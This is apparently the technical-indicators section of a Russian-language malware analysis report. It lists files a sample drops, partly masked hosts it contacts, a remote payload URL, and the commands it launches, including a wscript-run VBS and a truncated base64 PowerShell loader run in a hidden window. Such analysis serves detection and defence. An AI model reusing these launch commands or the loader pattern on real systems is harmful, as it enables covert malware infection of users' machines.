Техническая информация
- %WINDIR%\microsoft.net\framework64\v4.0.30319\regasm.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %LOCALAPPDATA%\366611.vbs
- '19#.#51.107.217':80
- 'te##gram.me':443
- 'st####ommunity.com':443
- http://19#.#51.107.217/public_files/mLDeqtd.txt
- 'st####ommunity.com':443
- DNS ASK te##gram.me
- DNS ASK st####ommunity.com
- '<SYSTEM32>\wscript.exe' //B %LOCALAPPDATA%\366611.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ondoiw ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\regasm.exe'